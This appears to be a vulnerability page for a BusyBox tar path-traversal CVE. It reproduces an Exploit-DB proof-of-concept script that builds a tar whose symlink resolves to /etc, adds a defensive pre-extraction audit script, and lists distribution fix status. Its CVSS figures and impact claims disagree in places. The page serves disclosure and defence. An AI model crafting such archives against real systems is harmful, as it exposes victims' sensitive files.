CVE-2026-26157

high
Published 2026-02-11 · Modified 2026-06-02
CVSS v3
7.0
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS v4
—
not yet in upstream
VIR risk
8.0

Description

A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft a malicious archive that, when extracted and under specific conditions, may write to files outside the intended extraction directory. This can lead to arbitrary file overwrite and, through the modification of sensitive system files, potentially to code execution.

Predictions

Exploit likelihood
100%
Patch ETA
—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.



Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-52538 webapps multiple text · 5 KB
Calil Khalil · 2026-04-30

BusyBox 1.37.0 - Path Traversal

text exploit Source: Exploit-DB
# Exploit Title: BusyBox 1.37.0 - Path Traversal 
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink targets
containing trailing ".." components. The strip_unsafe_prefix() function in
archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
the 4-character pattern and misses 3-character trailing "/.." sequences.

This allows an attacker to craft malicious archives with symlinks pointing to
arbitrary filesystem locations, enabling information disclosure through symlink
traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause:
archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
  cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
  if (!cp2) break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""

import tarfile
import sys
import os

def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.
    
    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    
    exploit_file = 'CVE-2026-26157_exploit.tar'
    
    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path
            # This bypasses strip_unsafe_prefix() pattern matching
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)
        
        print(f"[+] Exploit created: {exploit_file}")
        print(f"\n[*] Exploitation steps:")
        print(f"  1. mkdir test_extraction && cd test_extraction")
        print(f"  2. busybox tar xf ../{exploit_file}")
        print(f"  3. readlink -f sensitive_data")
        print(f"     Expected output: /etc")
        print(f"  4. ls sensitive_data/")
        print(f"     Result: Lists /etc directory contents")
        print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
        print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
        
        return exploit_file
        
    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)

def show_technical_details():
    """Display technical analysis of the vulnerability"""
    
    print("\n" + "="*70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("="*70)
    print("\nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
    print("\nVulnerable Code Pattern:")
    print("  cp2 = strstr(cp, \"/../\");  // Only matches 4-char sequence")
    print("  if (!cp2) break;")
    print("\nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print("  Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print("  Result: Sanitization bypassed, symlink created with original target")
    print("\nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("="*70 + "\n")

if __name__ == "__main__":
    print("="*70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("="*70)
    
    # Display technical analysis
    show_technical_details()
    
    # Create exploit
    exploit_file = create_exploit()
    
    print("\n[*] Mitigation:")
    print("  - Update BusyBox to patched version")
    print("  - Patch applies strip_unsafe_prefix() to symlink targets")
    print("  - Do not extract untrusted archives with elevated privileges")
    
    print("\n[*] For educational and authorized testing purposes only")
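The description above and the PoC docstring turn on the same point: a check that looks for the substring "/../" never sees a trailing "/.." such as the one in "/etc/pam.d/..". The following Python is an added example written for this page; it is not code from the Exploit-DB entry, from BusyBox, or from any published mitigation. It models that substring check in one line (a simplification of the pattern quoted in the PoC docstring, not BusyBox's strip_unsafe_prefix() itself), puts a lexical, component-aware check beside it, and runs both over a constructed in-memory tar containing the PoC's symlink, benign links and a classic "../" member name, as the audit one would run before handing an untrusted archive to busybox tar. The function names (substring_check_is_unsafe, escapes_root, audit_tar, build_sample_archive) and the sample members are this example's own.

```python
import io
import posixpath
import tarfile


def substring_check_is_unsafe(target):
    """Minimal model of the check quoted in the PoC docstring: a link target is
    treated as unsafe only if the 4-character sequence "/../" occurs in it.
    Simplified model for illustration, not BusyBox's own code. A trailing
    "/.." (3 characters) is never matched, so "/etc/pam.d/.." passes."""
    return "/../" in target


def escapes_root(name, link_target=None):
    """Lexically resolve an archive member name (or a symlink target relative to
    the directory holding the link) and report whether it lands outside the
    extraction root. Absolute paths and anything that normalises to a leading
    ".." component are rejected."""
    if link_target is None:
        path = name
    else:
        if posixpath.isabs(link_target):
            return True
        path = posixpath.join(posixpath.dirname(name), link_target)
    resolved = posixpath.normpath(path)
    return (posixpath.isabs(resolved)
            or resolved == ".."
            or resolved.startswith("../"))


def audit_tar(data):
    """Scan tar bytes before extraction; return [(member name, reason)] for
    every member whose name, hard-link target or symlink target escapes."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            if escapes_root(m.name):
                findings.append((m.name, "member name escapes root"))
            # A hard-link target is archive-relative; a symlink target is
            # relative to the directory that holds the link.
            if m.islnk() and escapes_root(m.linkname):
                findings.append((m.name, f"hard link to {m.linkname!r} escapes root"))
            elif m.issym() and escapes_root(m.name, m.linkname):
                findings.append((m.name, f"symlink to {m.linkname!r} escapes root"))
    return findings


def build_sample_archive():
    """Constructed sample archive, built in memory and never written to disk:
    the PoC's symlink, a benign file, two benign relative links and one member
    with a classic "../" name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add(name, kind, linkname="", data=b""):
            info = tarfile.TarInfo(name)
            info.type = kind
            info.linkname = linkname
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data) if data else None)

        add("sensitive_data", tarfile.SYMTYPE, "/etc/pam.d/..")   # the PoC member
        add("docs/readme.txt", tarfile.REGTYPE, data=b"hello\n")
        add("docs/latest", tarfile.SYMTYPE, "readme.txt")          # stays inside
        add("docs/up", tarfile.SYMTYPE, "../docs/readme.txt")      # ".." but stays inside
        add("../evil.txt", tarfile.REGTYPE, data=b"owned\n")       # classic traversal name
    return buf.getvalue()


if __name__ == "__main__":
    print("substring check flags '/etc/pam.d/..':",
          substring_check_is_unsafe("/etc/pam.d/.."))   # False: slips through
    for name, reason in audit_tar(build_sample_archive()):
        print(f"[!] {name}: {reason}")
```

The audit is purely lexical: it catches names and link targets that resolve outside the root on paper, but not a symlink chain, where a later member is written through a directory that an earlier member already turned into a link elsewhere. Extracting as an unprivileged user into an empty directory, or rejecting any member whose parent path crosses a link created earlier in the same archive, covers that case. Python's own tarfile rejects the same members when extracted with filter="data" (3.12 and later, and the 3.8 to 3.11 security releases that backported the filter), so this audit is for archives that will be extracted by something else, such as busybox tar.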

OS impact

SUSE: Affected (1 release)

Version    Status    Fixed in
—          Affected  —

Debian: Mixed (5 releases)

Version    Status    Fixed in
trixie     Affected  —
sid        Fixed     1:1.37.0-10.1
forky      Fixed     1:1.37.0-10.1
bullseye   Affected  —
bookworm   Affected  —

References

CWEs

CWE-73: External Control of File Name or Path

